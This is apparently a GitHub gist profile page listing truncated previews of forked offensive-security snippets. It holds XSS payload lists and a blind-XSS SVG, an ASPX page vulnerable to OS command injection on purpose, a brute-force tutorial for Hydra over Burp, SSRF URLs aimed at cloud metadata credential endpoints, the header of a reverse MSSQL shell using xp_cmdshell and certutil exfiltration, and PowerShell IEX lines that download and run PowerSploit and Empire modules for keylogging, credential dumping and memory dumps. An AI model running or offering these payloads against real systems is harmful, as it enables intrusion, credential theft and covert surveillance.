Skip to content

Instantly share code, notes, and snippets.

View CalfCrusher's full-sized avatar
Pwning

Christopher CalfCrusher

Pwning
127 followers · 76 following
View GitHub Profile
@CalfCrusher
CalfCrusher / Blind XSS in SVG FILE
Created January 10, 2023 14:38 — forked from ioribrn/Blind XSS in SVG FILE
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"
height="200"
zoomAndPan="disable"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink"
xml:space="preserve">
@CalfCrusher
CalfCrusher / xss-image.svg
Created January 10, 2023 14:38 — forked from rudSarkar/xss-image.svg
SVG Image XSS File
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
@CalfCrusher
CalfCrusher / gist:55e1505e027b48dc5de41e9f65a8069b
Created January 10, 2023 14:46 — forked from sempf/gist:f44714afe0050b83b6e647261d53b43e
666 XSS Vectors collected from the web
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@CalfCrusher
CalfCrusher / ping.aspx
Created January 11, 2023 15:12 — forked from stasinopoulos/ping.aspx
Simple ASPX application (vulnerable to OS command injections)
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e){
}
string ExcuteCmd(string arg){
ProcessStartInfo psi = new ProcessStartInfo();
@CalfCrusher
CalfCrusher / kali-headless.md
Created January 27, 2023 22:32 — forked from xErik/kali-headless.md
Configuring Headless (no X, GUI) Kali, Running In VirtualBox

Kali Headless Mode Configuration

Disabling the GUI/X/Head

systemctl set-default multi-user.target
systemctl get-default # shows new default mode
reboot
@CalfCrusher
CalfCrusher / tutorial_bruteforce_cookies_csrf_burp_rewrite.txt
Created March 9, 2023 09:49 — forked from intrd/tutorial_bruteforce_cookies_csrf_burp_rewrite.txt
Tutorial - Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
## Extract session and csrf using cURL, run Hydra/Patator bruteforce over Burpsuite proxy w/ rewritting macros
# @author intrd - http://dann.com.br/ (thx to g0tmi1k)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
## Burp csrf-rewritting macro
- Session handling rules = new macro, tick Tolerate URL mismatch when matching parameters..
Create a macro rule over method GET, extract custom parameter w/ parameter name = _csrf
and extract start after expression value=" and end at delimiter ", configure scope for domain and enable for Proxy,
Open session tracker to test. (on Intruder bruteforce, u need to untick Make unmodified baseline request).
- Proxy options = Enable Cookie jar for proxy, if not working, enable invisible proxing
@CalfCrusher
CalfCrusher / hash_examples.md
Created May 2, 2023 21:57 — forked from dwallraff/hash_examples.md
Hashcat hash types - https://hashcat.net/wiki/doku.php?id=example_hashes

Hashcat Example hashes

Unless otherwise noted, the password for all example hashes is hashcat

Hash-Mode Hash-Name Example
0 MD5 8743b52063cd84097a65d1633f5c74f5
10 md5($pass.$salt) 01dfae6e5d4d90d9892622325959afbe:7050461
@CalfCrusher
CalfCrusher / cloud_metadata.txt
Created May 11, 2023 16:15 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@CalfCrusher
CalfCrusher / mandros.py
Created May 19, 2023 15:03 — forked from xassiz/mandros.py
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@CalfCrusher
CalfCrusher / In-memory PS injection.txt
Created May 30, 2023 17:53 — forked from chr0n1k/In-memory PS injection.txt
Some in-memory Powershell injection scripts
#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Get-System.ps1');
#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Invoke-Inveigh.ps1')
#"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1')
#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-VaultCredential.ps1'); Get-VaultCredential
#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')